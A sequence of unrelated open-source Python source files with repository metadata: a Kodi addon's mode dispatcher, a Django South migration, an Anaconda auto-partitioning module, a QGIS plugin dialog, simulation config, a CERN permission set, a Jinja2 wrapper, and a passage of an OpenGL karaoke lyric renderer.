addon_log("getData")
getData(url,fanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==2:
addon_log("getChannelItems")
getChannelItems(name,url,fanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==3:
addon_log("getSubChannelItems")
getSubChannelItems(name,url,fanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==4:
addon_log("getFavorites")
getFavorites()
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==5:
addon_log("addFavorite")
try:
name = name.split('\\ ')[1]
except:
pass
try:
name = name.split(' - ')[0]
except:
pass
addFavorite(name,url,iconimage,fanart,fav_mode)
elif mode==6:
addon_log("rmFavorite")
try:
name = name.split('\\ ')[1]
except:
pass
try:
name = name.split(' - ')[0]
except:
pass
rmFavorite(name)
elif mode==7:
addon_log("addSource")
addSource(url)
elif mode==8:
addon_log("rmSource")
rmSource(name)
elif mode==9:
addon_log("download_file")
download_file(name, url)
elif mode==10:
addon_log("getCommunitySources")
getCommunitySources()
elif mode==11:
addon_log("addSource")
addSource(url)
elif mode==12:
addon_log("setResolvedUrl")
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
elif mode==13:
addon_log("play_playlist")
play_playlist(name, playlist)
elif mode==14:
addon_log("get_xml_database")
get_xml_database(url)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==15:
addon_log("browse_xml_database")
get_xml_database(url, True)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==16:
addon_log("browse_community")
getCommunitySources(True)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==17:
addon_log("getRegexParsed")
getRegexParsed(regexs, url)
|
Easystreams/plugin.video.easystreams-1.63
|
default.py
|
Python
|
gpl-2.0
| 34,357
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'WordsSet.orderby'
db.alter_column(u'game_wordsset', 'orderby', self.gf('django.db.models.fields.CharField')(max_length=64, null=True))
# Changing field 'WordsSet.pernum'
db.alter_column(u'game_wordsset', 'pernum', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'Words.level'
db.alter_column(u'game_words', 'level', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'Words.features'
db.alter_column(u'game_words', 'features', self.gf('django.db.models.fields.TextField')(max_length=256, null=True))
def backwards(self, orm):
# Changing field 'WordsSet.orderby'
db.alter_column(u'game_wordsset', 'orderby', self.gf('django.db.models.fields.CharField')(default=None, max_length=64))
# Changing field 'WordsSet.pernum'
db.alter_column(u'game_wordsset', 'pernum', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'Words.level'
db.alter_column(u'game_words', 'level', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'Words.features'
db.alter_column(u'game_words', 'features', self.gf('django.db.models.fields.TextField')(default=None, max_length=256))
models = {
u'game.words': {
'Meta': {'object_name': 'Words'},
'classify': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'features': ('django.db.models.fields.TextField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
u'game.wordsset': {
'Meta': {'object_name': 'WordsSet'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'orderby': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'pernum': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['game']
|
zdilby/word-turn-off
|
migrations/0002_auto__chg_field_wordsset_orderby__chg_field_wordsset_pernum__chg_field.py
|
Python
|
gpl-2.0
| 2,605
|
#
# Auto partitioning module.
#
# Copyright (C) 2018 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
import copy
from pyanaconda.anaconda_loggers import get_module_logger
from pyanaconda.core.constants import DEFAULT_AUTOPART_TYPE
from pyanaconda.core.signal import Signal
from pyanaconda.modules.common.structures.partitioning import PartitioningRequest
from pyanaconda.modules.storage.partitioning.automatic.resizable_module import \
ResizableDeviceTreeModule
from pyanaconda.modules.storage.partitioning.base import PartitioningModule
from pyanaconda.modules.storage.partitioning.automatic.automatic_interface import \
AutoPartitioningInterface
from pyanaconda.modules.storage.partitioning.constants import PartitioningMethod
from pyanaconda.modules.storage.partitioning.automatic.automatic_partitioning import \
AutomaticPartitioningTask
log = get_module_logger(__name__)
class AutoPartitioningModule(PartitioningModule):
"""The auto partitioning module."""
def __init__(self):
"""Initialize the module."""
super().__init__()
self.request_changed = Signal()
self._request = PartitioningRequest()
@property
def partitioning_method(self):
"""Type of the partitioning method."""
return PartitioningMethod.AUTOMATIC
def for_publication(self):
"""Return a DBus representation."""
return AutoPartitioningInterface(self)
def _create_device_tree(self):
"""Create the device tree module."""
return ResizableDeviceTreeModule()
def process_kickstart(self, data):
"""Process the kickstart data."""
request = PartitioningRequest()
if data.autopart.type is not None:
request.partitioning_scheme = data.autopart.type
if data.autopart.fstype:
request.file_system_type = data.autopart.fstype
if data.autopart.noboot:
request.excluded_mount_points.append("/boot")
if data.autopart.nohome:
request.excluded_mount_points.append("/home")
if data.autopart.noswap:
request.excluded_mount_points.append("swap")
if data.autopart.encrypted:
request.encrypted = True
request.passphrase = data.autopart.passphrase
request.cipher = data.autopart.cipher
request.luks_version = data.autopart.luks_version
request.pbkdf = data.autopart.pbkdf
request.pbkdf_memory = data.autopart.pbkdf_memory
request.pbkdf_time = data.autopart.pbkdf_time
request.pbkdf_iterations = data.autopart.pbkdf_iterations
request.escrow_certificate = data.autopart.escrowcert
request.backup_passphrase_enabled = data.autopart.backuppassphrase
self.set_request(request)
def setup_kickstart(self, data):
"""Setup the kickstart data."""
data.autopart.autopart = True
data.autopart.fstype = self.request.file_system_type
if self.request.partitioning_scheme != DEFAULT_AUTOPART_TYPE:
data.autopart.type = self.request.partitioning_scheme
data.autopart.nohome = "/home" in self.request.excluded_mount_points
data.autopart.noboot = "/boot" in self.request.excluded_mount_points
data.autopart.noswap = "swap" in self.request.excluded_mount_points
data.autopart.encrypted = self.request.encrypted
# Don't generate sensitive information.
data.autopart.passphrase = ""
data.autopart.cipher = self.request.cipher
data.autopart.luks_version = self.request.luks_version
data.autopart.pbkdf = self.request.pbkdf
data.autopart.pbkdf_memory = self.request.pbkdf_memory
data.autopart.pbkdf_time = self.request.pbkdf_time
data.autopart.pbkdf_iterations = self.request.pbkdf_iterations
data.autopart.escrowcert = self.request.escrow_certificate
data.autopart.backuppassphrase = self.request.backup_passphrase_enabled
@property
def request(self):
"""The partitioning request."""
return self._request
def set_request(self, request):
"""Set the partitioning request.
:param request: a request
"""
self._request = request
self.request_changed.emit()
log.debug("Request is set to '%s'.", request)
def requires_passphrase(self):
"""Is the default passphrase required?
:return: True or False
"""
return self.request.encrypted and not self.request.passphrase
def set_passphrase(self, passphrase):
"""Set a default passphrase for all encrypted devices.
:param passphrase: a string with a passphrase
"""
# Update the request with a new copy.
request = copy.deepcopy(self.request)
request.passphrase = passphrase
self.set_request(request)
def configure_with_task(self):
"""Schedule the partitioning actions."""
return AutomaticPartitioningTask(self.storage, self.request)
|
atodorov/anaconda
|
pyanaconda/modules/storage/partitioning/automatic/automatic_module.py
|
Python
|
gpl-2.0
| 5,929
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
geopunt4QgisAboutdialog
A QGIS plugin
"Tool om geopunt in QGIS te gebruiken"
-------------------
begin : 2013-12-08
copyright : (C) 2013 by Kay Warrie
email : kaywarrie@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os.path
from qgis.PyQt.QtCore import Qt, QSettings, QTranslator, QCoreApplication
from qgis.PyQt.QtWidgets import QPushButton, QDialog, QDialogButtonBox
from .ui_geopunt4QgisAbout import Ui_aboutDlg
class geopunt4QgisAboutDialog(QDialog):
def __init__(self):
QDialog.__init__(self, None)
self.setWindowFlags( self.windowFlags() & ~Qt.WindowContextHelpButtonHint )
self.setWindowFlags( self.windowFlags() | Qt.WindowStaysOnTopHint)
# initialize locale
locale = QSettings().value("locale/userLocale", "en")
if not locale: locale == 'en'
else: locale = locale[0:2]
localePath = os.path.join(os.path.dirname(__file__), 'i18n',
'geopunt4qgis_{}.qm'.format(locale))
if os.path.exists(localePath):
self.translator = QTranslator()
self.translator.load(localePath)
QCoreApplication.installTranslator(self.translator)
if locale == 'en':
self.htmlFile = os.path.join(os.path.dirname(__file__), 'i18n', 'about-en.html')
else:
#dutch is default
self.htmlFile = os.path.join(os.path.dirname(__file__), 'i18n', 'about-nl.html')
self._initGui()
def _initGui(self):
# Set up the user interface from Designer.
self.ui = Ui_aboutDlg()
self.ui.setupUi(self)
self.ui.buttonBox.addButton( QPushButton("Sluiten"), QDialogButtonBox.RejectRole )
with open(self.htmlFile,'r', encoding="utf-8") as html:
self.ui.aboutText.setHtml( html.read() )
|
warrieka/geopunt4Qgis
|
geopunt4QgisAbout.py
|
Python
|
gpl-2.0
| 2,694
|
import Pyro4
from pyage.core import address
from pyage.core.stop_condition import StepLimitStopCondition
from pyage_forams.solutions.distributed.neighbour_matcher import Neighbour3dMatcher
from pyage_forams.solutions.distributed.request import create_dispatcher
from pyage_forams.solutions.environment import environment_factory, Environment3d
from pyage_forams.solutions.foram import create_forams
from pyage_forams.solutions.genom import GenomFactory
from pyage_forams.solutions.insolation_meter import StaticInsolation
from pyage_forams.solutions.statistics import MultipleStatistics, PsiStatistics, CsvStatistics
factory = GenomFactory(chambers_limit=5)
genom_factory = lambda: factory.generate
forams = create_forams(1, initial_energy=5)
insolation_meter = StaticInsolation
size = lambda: 50
reproduction_minimum = lambda: 50
movement_energy = lambda: 0.5
growth_minimum = lambda: 30
energy_need = lambda: 0.2
algae_limit = lambda: 20
algae_growth_probability = lambda: 0.3
newborn_limit = lambda:6
reproduction_probability = lambda: 0.5
growth_probability = lambda: 0.5
growth_cost_factor = lambda: 0.8
capacity_factor = lambda: 1.1
initial_algae_probability = lambda: 0.2
environment = environment_factory(regeneration_factor=0.1, clazz=Environment3d)
stop_condition = lambda: StepLimitStopCondition(500)
stats = lambda: MultipleStatistics([CsvStatistics(), PsiStatistics()])
cell_capacity = lambda: 1
address_provider = address.SequenceAddressProvider
request_dispatcher = create_dispatcher()
neighbour_matcher = Neighbour3dMatcher
ns_hostname = lambda: "127.0.0.1"
pyro_daemon = Pyro4.Daemon()
daemon = lambda: pyro_daemon
|
maciek123/pyage-forams
|
pyage_forams/conf/distributed3d/common.py
|
Python
|
gpl-2.0
| 1,637
|
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2016 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""CAP ATLAS permissions"""
from invenio_access import DynamicPermission
from cap.modules.experiments.permissions.common import get_collaboration_group_needs, get_superuser_needs
atlas_group_need = set(
[g for g in get_collaboration_group_needs('ATLAS')])
atlas_group_need |= set([g for g in
get_superuser_needs()])
atlas_permission = DynamicPermission(*atlas_group_need)
|
xchen101/analysis-preservation.cern.ch
|
cap/modules/experiments/permissions/atlas.py
|
Python
|
gpl-2.0
| 1,496
|
# -*- coding: utf-8 -*-
'''
Created on Jul 11, 2013
@author: Carl, Aaron
'''
import os
from mb.coordinator import _Pretty
from jinja2 import Environment,FileSystemLoader,TemplateNotFound
from mb.config import ERROR_NO_404, ERROR_NO_500
class Template(object):
'''
这里封装了Jinja2的模板引擎
'''
def render(self, templateName, **context):
extensions = context.pop('extensions', [])
globalVars = context.pop('globals', {})
templatePath = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'templates')
jinjaEnv = Environment(
loader=FileSystemLoader(templatePath),
extensions=extensions,
)
jinjaEnv.globals.update(globalVars)
try:
return jinjaEnv.get_template(templateName + ".html").render(context)
except TemplateNotFound:
_Pretty.handleError("Cannot find the template[" + templateName + "] in " + templatePath, ERROR_NO_404)
except:
errorInfo = os.sys.exc_info()
_Pretty.handleError("Error '%s' happened on line %d\n" % (errorInfo[0], errorInfo[2].tb_lineno), ERROR_NO_500)
|
MoneyBack/MoneyBack
|
mb/template.py
|
Python
|
gpl-2.0
| 1,182
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2013 Hector Martin "marcan" <hector@marcansoft.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 or version 3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from OpenGL.arrays import vbo
import OpenGL.GL as gl
import OpenGL.GL.shaders as shaders
import numpy as np
from blitzloop import song, texture_font
from blitzloop.util import map_from, map_to
vs_karaoke = """
#version 110
attribute vec2 vertex;
attribute vec2 texcoord;
attribute vec3 border_color;
attribute vec3 fill_color;
attribute vec3 outline_color;
attribute vec3 border_color_on;
attribute vec3 fill_color_on;
attribute vec3 outline_color_on;
attribute float glyph_time;
attribute vec2 atom_time;
attribute vec2 line_time;
uniform float time;
varying vec2 v_texcoord;
varying vec3 v_border_color;
varying vec3 v_fill_color;
varying vec3 v_outline_color;
varying vec3 v_border_color_on;
varying vec3 v_fill_color_on;
varying vec3 v_outline_color_on;
varying float v_alpha;
varying float v_time;
float fade = 0.5;
float linstep(float min, float max, float v) {
return clamp((v - min) / (max - min), 0.0, 1.0);
}
void main() {
v_texcoord = texcoord.st;
v_time = glyph_time;
v_fill_color = fill_color;
v_border_color = border_color;
v_outline_color = outline_color;
v_fill_color_on = fill_color_on;
v_border_color_on = border_color_on;
v_outline_color_on = outline_color_on;
float line_start = line_time.x;
float line_end = line_time.y;
float fade_in = linstep(line_start, line_start + fade, time);
float fade_out = linstep(line_end - fade, line_end, time);
v_alpha = fade_in - fade_out;
vec4 pos = vec4(vertex.x, vertex.y, 0.0, 1.0);
float x_shift = 0.03;
pos.x -= x_shift * smoothstep(0.0, 2.0, 1.0 - fade_in);
pos.x += x_shift * smoothstep(0.0, 2.0, fade_out);
gl_Position = gl_ModelViewProjectionMatrix * pos;
}
"""
fs_karaoke = """
#version 110
uniform float time;
uniform sampler2D tex;
varying vec2 v_texcoord;
varying vec3 v_border_color;
varying vec3 v_fill_color;
varying vec3 v_outline_color;
varying vec3 v_border_color_on;
varying vec3 v_fill_color_on;
varying vec3 v_outline_color_on;
varying float v_alpha;
varying float v_time;
void main() {
vec4 texel = texture2D(tex, v_texcoord.st);
float outline = texel.b;
float border = texel.g;
float fill = texel.r;
vec3 outline_color, border_color, fill_color;
if (v_time < time) {
outline_color = v_outline_color_on;
border_color = v_border_color_on;
fill_color = v_fill_color_on;
} else {
outline_color = v_outline_color;
border_color = v_border_color;
fill_color = v_fill_color;
}
float a = (outline + border + fill);
gl_FragColor.rgb = outline_color * outline;
gl_FragColor.rgb += border_color * border;
gl_FragColor.rgb += fill_color * fill;
if (a > 0.0) {
gl_FragColor.rgb /= clamp(a, 0.0, 1.0);
} else {
gl_FragColor.rgb = vec3(0.0, 0.0, 0.0);
}
gl_FragColor.a = a * v_alpha;
}
"""
class GlyphInstance(object):
def __init__(self, glyph, x, y, style):
self.glyph = glyph
self.x = x
self.y = y
self.tx1 = self.tx2 = 0
self.t1 = self.t2 = 0
self.colors = style.colors
self.colors_on = style.colors_on
def set_timing(self, tx1, tx2, t1, t2):
self.tx1 = tx1
self.tx2 = tx2
self.t1 = t1
self.t2 = t2
def __repr__(self):
return "Gl(%.04f,%.04f)" % (self.x, self.y)
class DisplayLine(object):
def __init__(self, display):
self.display = display
self.glyphs = []
self.text = ""
self.px = 0
self.py = 0
self.x = 0.0
self.y = 0.0
self._start_t = None
self._end_t = None
self.start = None
self.end = None
self.fade_in_time = self.fade_out_time = 1
self.descender = 0
self.ascender = 0
self.want_row = None
def copy(self):
l = DisplayLine(self.display)
l.text = self.text
l.glyphs = list(self.glyphs)
l.px = self.px
l.py = self.py
l.x = self.x
l.y = self.y
l._start_t = self._start_t
l._end_t = self._end_t
l.start = self.start
l.end = self.end
l.ascender = self.ascender
l.descender = self.descender
l.want_row = self.want_row
return l
@property
def width(self):
return self.px
@property
def height(self):
return self.ascender - self.descender
@property
def lim_start(self):
return self._start_t - self.fade_in_time
@property
def lim_end(self):
return self._end_t + self.fade_in_time
def add(self, molecule, get_atom_time, style, font, ruby_font):
# append a space if we are joining with a previous molecule
space_char = molecule.SPACE
if self.glyphs:
glyph = font.get_glyph(space_char)
self.px += glyph.dx
self.py += glyph.dy
self.text += space_char
prev_char = None
step = 0
new_ascender = font.ascender
if ruby_font:
new_ascender += ruby_font.ascender - ruby_font.descender
self.ascender = max(self.ascender, new_ascender)
self.descender = min(self.descender, font.descender)
# add the molecule's atoms
for atom in molecule.atoms:
atom_x, atom_y = self.px, self.py
edge_px = None
glyphs = []
# add the atom's base text as glyphs
for i,c in enumerate(atom.text):
if atom.particle_edge is not None and i == atom.particle_edge:
edge_px = self.px
self.text += c
glyph = font.get_glyph(c)
gi = GlyphInstance(glyph, self.px, self.py, style)
if prev_char is not None:
kx, ky = font.get_kerning(prev_char, c)
self.px += kx
self.py += ky
glyphs.append(gi)
self.px += glyph.dx
self.py += glyph.dy
prev_char = c
# assign the timing map for the atom's glyphs
# atom_x (left) -> atom start time
# self.px (right) -> atom end time
for glyph in glyphs:
start, end = get_atom_time(step, atom.steps)
if self._start_t is None:
self._start_t = start
else:
self._start_t = min(start, self._start_t)
if self._end_t is None:
self._end_t = end
else:
self._end_t = max(end, self._end_t)
glyph.set_timing(atom_x, self.px, start, end)
self.glyphs += glyphs
# if the atom has subatomic particles (ruby text)
if atom.particles is not None and ruby_font:
# ruby pen. we will adjust X later when centering over atom.
ruby_px = 0
ruby_py = self.display.round_coord(atom_y + font.ascender - ruby_font.descender)
ruby_prev_char = None
ruby_glyphs = []
par_step = step
# add the particles
for particle in atom.particles:
par_glyphs = []
particle_x = ruby_px
# add the characters in the particle
for c in particle.text:
glyph = ruby_font.get_glyph(c)
gi = GlyphInstance(glyph, ruby_px, ruby_py, style)
if ruby_prev_char is not None:
kx, ky = ruby_font.get_kerning(ruby_prev_char, c)
ruby_px += kx
ruby_py += ky
par_glyphs.append(gi)
ruby_px += glyph.dx
ruby_py += glyph.dy
ruby_prev_char = c
for glyph in par_glyphs:
start, end = get_atom_time(par_step, particle.steps)
glyph.set_timing(particle_x, ruby_px, start, end)
par_step += particle.steps
ruby_glyphs += par_glyphs
# center the ruby text over the atom
if edge_px is not None:
atom_width = edge_px - atom_x
else:
atom_width = self.px - atom_x
dx = self.display.round_coord(atom_x + (atom_width - ruby_px) / 2.0)
for glyph in ruby_glyphs:
glyph.tx1 += dx
glyph.tx2 += dx
glyph.x += dx
self.glyphs.append(glyph)
step += atom.steps
self.start = self.lim_start
self.end = self.lim_end
def build(self):
vbodata = []
idxdata = []
for i,g in enumerate(self.glyphs):
tleft = map_to(map_from(g.x + g.glyph.left, g.tx1, g.tx2), g.t1, g.t2)
tright = map_to(map_from(g.x + g.glyph.right, g.tx1, g.tx2), g.t1, g.t2)
const_vbodata = list(i/255.0 for i in sum(g.colors + g.colors_on, ()))
const_vbodata += (g.t1, g.t2, self.start, self.end)
vbodata.append(
[g.x + g.glyph.left, g.y + g.glyph.bot,
g.glyph.tex_left, g.glyph.tex_bot,
tleft] + const_vbodata)
vbodata.append(
[g.x + g.glyph.left, g.y + g.glyph.top,
g.glyph.tex_left, g.glyph.tex_top,
tleft] + const_vbodata)
vbodata.append(
[g.x + g.glyph.right, g.y + g.glyph.top,
g.glyph.tex_right, g.glyph.tex_top,
tright] + const_vbodata)
vbodata.append(
[g.x + g.glyph.right, g.y + g.glyph.bot,
g.glyph.tex_right, g.glyph.tex_bot,
tright] + const_vbodata)
idxdata += (i*4, i*4+1, i*4+2, i*4+2, i*4+3, i*4)
self.vbo = vbo.VBO(np.asarray(vbodata, np.float32), gl.GL_STATIC_DRAW, gl.GL_ARRAY_BUFFER)
self.ibo = vbo.VBO(np.asarray(idxdata, np.uint16), gl.GL_STATIC_DRAW, gl.GL_ELEMENT_ARRAY_BUFFER)
self.count = len(self.glyphs)
def draw(self, renderer):
with self.vbo, self.ibo:
gl.glPushMatrix()
x = self.display.round_coord(self.x)
y = self.display.round_coord(self.y)
gl.glTranslate(x, y, 0)
renderer.enable_attribs()
stride = 27*4
off = 0
off += renderer.attrib_pointer("vertex", stride, off, self.vbo)
off += renderer.attrib_pointer("texcoord", stride, off, self.vbo)
off += renderer.attrib_pointer("glyph_time", stride, off, self.vbo)
off += renderer.attrib_pointer("fill_color", stride, off, self.vbo)
off += renderer.attrib_pointer("border_color", stride, off, self.vbo)
off += renderer.attrib_pointer("outline_color", stride, off, self.vbo)
off += renderer.attrib_pointer("fill_color_on", stride, off, self.vbo)
off += renderer.attrib_pointer("border_color_on", stride, off, self.vbo)
off += renderer.attrib_pointer("outline_color_on", stride, off, self.vbo)
off += renderer.attrib_pointer("atom_time", stride, off, self.vbo)
off += renderer.attrib_pointer("line_time", stride, off, self.vbo)
assert off == stride
gl.glDrawElements(gl.GL_TRIANGLES, 6*self.count, gl.GL_UNSIGNED_SHORT, self.ibo)
renderer.disable_attribs()
gl.glPopMatrix()
def __unicode__(self):
return "DisplayLine<[%s]>" % self.text
class SongLayout(object):
def __init__(self, song_obj, variant, renderer):
self.song = song_obj
self.variant = song_obj.variants[variant]
self.renderer = renderer
self.margin = 0.07
self.rowspacing = 0.01
self.wrapwidth = 1.0 - self.margin * 2
self.pre_line = 1.0
self.post_line = 1.0
self.lines = {}
self.fonts = {}
self._merge_lines()
self._layout_lines(self.lines[song.TagInfo.BOTTOM], False)
self._layout_lines(self.lines[song.TagInfo.TOP], True)
self._build_lines()
self.renderer.atlas.upload()
def _get_font(self, style, ruby=False):
font = style.font if not ruby else style.ruby_font
size = style.size if not ruby else style.ruby_size
if size == 0:
return None
ident = (font, size, style.border_width, style.outline_width)
if ident in self.fonts:
return self.fonts[ident]
else:
fontfile = self.song.get_font_path(font)
font = texture_font.TextureFont(self.renderer.display.width, self.renderer.atlas, fontfile, size, style)
self.fonts[ident] = font
return font
def _merge_lines(self):
edges = {
song.TagInfo.TOP: [],
song.TagInfo.BOTTOM: []
}
for compound in self.song.compounds:
for tag, molecule in compound.items():
if tag in self.variant.tags:
tag_info = self.variant.tags[tag]
edges[tag_info.edge].append((compound.get_atom_time, tag_info, molecule))
for edge, molecules in edges.items():
lines = []
line = None
for get_atom_time, tag_info, molecule in molecules:
font = self._get_font(tag_info.style, False)
if molecule.has_ruby:
ruby_font = self._get_font(tag_info.style, True)
else:
ruby_font = None
if molecule.break_before or line is None:
line = DisplayLine(self.renderer.display)
line.add(molecule, get_atom_time, tag_info.style, font, ruby_font)
lines.append(line)
if molecule.row is not None:
line.want_row = molecule.row
else:
tmp = line.copy()
tmp.add(molecule, get_atom_time, tag_info.style, font, ruby_font)
if tmp.px > self.wrapwidth:
line = DisplayLine(self.renderer.display)
line.add(molecule, get_atom_time, tag_info.style, font, ruby_font)
lines.append(line)
else:
lines[-1] = line = tmp
if molecule.break_after:
line = None
self.lines[edge] = lines
def _build_lines(self):
for lines in self.lines.values():
for dl in lines:
dl.build()
def _layout_lines(self, lines, top=False):
if not lines:
return
rows = [[] for i in range(10)]
lines.sort(key = lambda x: x.start)
def sortrow(rowid):
rows[rowid].sort(key = lambda x: x.start)
def collides(l, rowid):
c = []
for l2 in rows[rowid][::-1]:
if l.start >= l2.end:
return c
elif l.end <= l2.start:
continue
else:
c.append(l2)
else:
return c
def canmoveup(l, limit=1):
if l.row >= limit:
return False
for l2 in collides(l, l.row + 1):
if not canmoveup(l2, limit):
return False
return True
def moveup(l, limit=1):
assert l.row < limit
for l2 in collides(l, l.row + 1):
moveup(l2, limit)
rows[l.row].remove(l)
sortrow(l.row)
l.row += 1
assert not collides(l, l.row)
rows[l.row].append(l)
sortrow(l.row)
def canmovetop(l):
return True
def movetop(l):
if l.row == 0:
# FIXME: this can cause another line to violate the
# "no jumping ahead" rule. meh.
for row in range(len(rows)):
if collides(l, row):
need_row = row + 1
else:
need_row = l.row - 1
for l2 in collides(l, need_row):
movetop(l2)
rows[l.row].remove(l)
sortrow(l.row)
l.row = need_row
rows[l.row].append(l)
sortrow(l.row)
if not top:
for i, l in enumerate(lines):
if l.want_row is not None and not collides(l, l.want_row):
l.row = l.want_row
rows[l.want_row].append(l)
elif not collides(l, 1):
l.row = 1
rows[1].append(l)
elif not collides(l, 0):
l.row = 0
rows[0].append(l)
else:
need_row = 2
while collides(l, need_row):
need_row += 1
for want_row in (lines[i-1].row,):
if canmoveup(rows[want_row][-1], need_row):
moveup(rows[want_row][-1], need_row)
l.row = want_row
rows[want_row].append(l)
break
else:
l.row = need_row
rows[need_row].append(l)
else:
for i, l in enumerate(lines):
for row in range(len(rows)):
if not collides(l, row):
need_row = row
break
if i == 0 or need_row <= (lines[i-1].row + 1):
l.row = need_row
rows[need_row].append(l)
else:
for want_row in (lines[i-1].row, lines[i-1].row + 1):
if canmovetop(rows[want_row][-1]):
movetop(rows[want_row][-1])
l.row = want_row
rows[want_row].append(l)
break
else:
l.row = need_row
rows[need_row].append(l)
max_ascender = max(l.ascender for l in lines)
min_descender = min(l.descender for l in lines)
row_height = max_ascender - min_descender + self.rowspacing
lastrow = 1 if top else -1
max_end = 0
prev_l = None
for i, l in enumerate(lines):
next_l = lines[i+1] if i < len(lines)-1 else None
if not top:
if l.row == 0:
l.x = self.margin + (self.wrapwidth - l.width) # right
elif (l.start > max_end or l.row > lastrow) and (max_end > l.end or (next_l and next_l.start < l.end)):
l.x = self.margin # left
else:
l.x = self.margin + (self.wrapwidth - l.width) / 2.0 # center
else:
if (l.start > max_end or l.row < lastrow) and (max_end > l.end or (next_l and next_l.start < l.end)):
l.x = self.margin # left
elif l.row >= 1 and not (next_l and next_l.row > l.row) and (max_end > l.end or (next_l and next_l.start < l.end)):
l.x = self.margin + (self.wrapwidth - l.width) # right
else:
l.x = self.margin + (self.wrapwidth - l.width) / 2.0 # center
if max_end > l.start and prev_l:
orig_start = l.start
l.start = max(min(l.start, prev_l.lim_start), l.start - 5)
if prev_l.row < l.row:
l.start = min(orig_start, max(l.start, prev_l.start + 1.5))
prev_in_row = rows[l.row].index(l) - 1
if prev_in_row >= 0:
l.start = max(l.start, rows[l.row][prev_in_row].end)
max_end = max(max_end, l.end)
lastrow = l.row
if not top:
l.y = self.margin - min_descender + row_height * l.row
else:
l.y = self.renderer.display.top - self.margin - max_ascender - row_height * l.row
prev_l = l
def _layout_lines_top(self, lines):
if not lines:
return
def draw(self, t, renderer):
for edge, lines in self.lines.items():
for l in lines:
if l.start <= t <= l.end:
l.draw(renderer)
class Renderer(object):
UNIFORMS = [
"tex", "time"
]
ATTRIBUTES = {
"vertex": (2, gl.GL_FLOAT),
"texcoord": (2, gl.GL_FLOAT),
"glyph_time": (1, gl.GL_FLOAT),
"atom_time": (2, gl.GL_FLOAT),
"line_time": (2, gl.GL_FLOAT),
"border_color": (3, gl.GL_FLOAT),
"fill_color": (3, gl.GL_FLOAT),
"outline_color": (3, gl.GL_FLOAT),
"border_color_on": (3, gl.GL_FLOAT),
"fill_color_on": (3, gl.GL_FLOAT),
"outline_color_on": (3, gl.GL_FLOAT),
}
TYPE_LEN = {
gl.GL_FLOAT: 4
}
def __init__(self, display):
self.display = display
self.shader = shaders.compileProgram(
shaders.compileShader(vs_karaoke, gl.GL_VERTEX_SHADER),
shaders.compileShader(fs_karaoke, gl.GL_FRAGMENT_SHADER),
)
for i in self.UNIFORMS:
setattr(self, "l_" + i, gl.glGetUniformLocation(self.shader, i))
self.attrib_loc = {i: gl.glGetAttribLocation(self.shader, i) for i in self.ATTRIBUTES}
